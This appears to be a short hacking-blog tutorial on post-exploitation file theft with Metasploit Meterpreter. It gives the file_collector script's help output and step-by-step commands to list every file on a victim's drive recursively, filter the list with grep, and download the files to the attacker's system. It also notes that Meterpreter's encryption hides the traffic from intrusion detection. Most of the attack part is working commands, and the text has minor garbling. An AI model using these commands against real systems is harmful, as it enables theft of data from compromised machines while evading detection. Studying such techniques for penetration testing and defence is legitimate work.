Downloading files from a victim with Metasploit Meterpreter scripts ?


1) >The Meterpreter shell has a lot of neat features, including encryption of all the traffic between our attacking system and target. This prevents any interception and scanning of the data from intrusion detection systems (IDS).

2) Downloading individual files:

From the Meterpreter console it is possible to download individual files using the "download" command. Which is pretty straightforward and easy if you only want to download one file.
Meterpreter has a lot of useful inbuilt scripts to make post exploitation tasks such as data collection easier. To view the options, simply type "run" and then space-tab-tab to see the auto-completion options:

et's look at "run file_collector" first:

3) In the example below, I wanted to copy all the data from the E: drive of a Windows target, with the exception of a couple of directories that I am not interested in.
(In this actual example I am copying some files from a "Teach yourself C for Linux in 21 days" CD which is in the drive on the target system, onto my attacking system ;o)

3) To view the "run file_collector" options, use "-h"

meterpreter > run file_collector -h
Meterpreter Script for searching and downloading files that
match a specific pattern. First save files to a file, edit and
use that same file to download the choosen files.

🦑 OPTIONS:

    -d   Directory to start search on, search will be recursive.
    -f   Search blobs separated by a |.
    -h        Help menu.
    -i   Input file with list of files to download, one per line.
    -l   Location where to save the files.
    -o   Output File to save the full path of files found.
    -r        Search subdirectories.


meterpreter >

5) As you can see in the description, this is a three stage process. First, we create a file list, then we remove any files we don't want from the list, then we execute the download process.

6) Creating the file list

run file_collector -r -d e:\\ -f * -o /root/Courses/CforLinux/file.txt

We are running the collector recursively, looking for all files on the E: drive, and storing a list of these files in a "file.txt" file on my attacking system.

🦑As Meterpreter copies files over an encrypted connection, this can make the data transfer slower, so best to strip out any unneeded files.

Editing the file list

I don't need some of the directories on the target data drive, so I use grep to remove these, and make a new file "file.lst".
No
cat /root/Courses/CforLinux/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst2

(I am removing the \DDD \GCC \GDB \MAKE directories, which is not particularly relevant to you, just an example. I am chopping two carrots with one knife here, as this was useful to me at the time ;o)

🦑Downloading the file list

Once we have the edited file list we can simply start the file download process with the following command:

run file_collector -i /root/Courses/CforLinux/file.lst -l /root/Courses/CforLinux/

Written by undercode









Follow us for more... 

No comments:

Post a Comment

What is Prototype content functions in JavaScript Framework Programming.mp4

  Download now Enjoy! Follow us for more...